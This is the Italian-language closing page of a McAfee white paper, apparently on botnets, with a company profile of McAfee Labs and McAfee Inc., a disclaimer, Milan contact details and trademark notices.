• White paper tecnici McAfee Labs. http://www.mcafee.com/us/threat_center/white_paper.html
McAfee Labs™
McAfee Labs è il gruppo di ricerca mondiale di McAfee, Inc. Con l'unica organizzazione di ricerca
focalizzata su tutti i vettori di minaccia, ovvero malware, web, e-mail, rete e vulnerabilità, McAfee Labs
è in grado di sfruttare l'intelligence di milioni di sensori e tecnologie di reputazione "in the cloud", quali
McAfee Artemis™ e McAfee TrustedSource™. I 350 ricercatori pluridisciplinari di McAfee Labs in 30 nazioni
seguono la gamma completa di minacce in tempo reale, identificando le vulnerabilità delle applicazioni,
analizzando e correlando i rischi e attivando rimedi immediati per proteggere aziende e consumatori.
Informazioni su McAfee
Con sede principale a Santa Clara, California, McAfee Inc. è la principale azienda focalizzata sulle
tecnologie di sicurezza. McAfee è costantemente impegnata ad affrontare le più difficili sfide legate
alla sicurezza. L'azienda offre prodotti e servizi di sicurezza riconosciuti e proattivi che proteggono
sistemi e reti in tutto il mondo, consentendo agli utenti di collegarsi a Internet, navigare ed effettuare
acquisti sul web in modo sicuro. Supportata da un pluripremiato team di ricerca, McAfee crea prodotti
innovativi destinati a utenti consumer, aziende, pubblica amministrazione e service provider che
necessitano di conformarsi alle normative, proteggere i dati, prevenire le interruzioni dell'attività,
individuare le vulnerabilità e monitorare e migliorare costantemente la propria sicurezza.
http://www.mcafee.com/it.
Le informazioni contenute nel presente documento sono fornite solo a scopo istruttivo e a vantaggio dei clienti di McAfee. Le informazioni
contenute nel presente documento sono soggette a modifica senza preavviso e vengono fornite "così come sono" senza alcuna garanzia
relativamente alla loro precisione o applicabilità a qualunque situazione o circostanza specifica.
McAfee Srl
via Fantoli, 7
20138 Milano
Italia
(+39) 02 554171
www.mcafee.com/it
McAfee e il logo McAfee sono marchi registrati o marchi di McAfee, Inc. o sue filiali negli Stati Uniti e altre nazioni. Gli altri marchi e le altre
marche possono essere di proprietà di terzi. I piani, le specifiche e le descrizioni dei prodotti sono qui forniti a puro scopo informativo e sono
soggetti a variazioni senza preavviso, e vengono forniti senza alcun tipo di garanzia, esplicita o implicita.
10204wp_botnets_0710_ETMG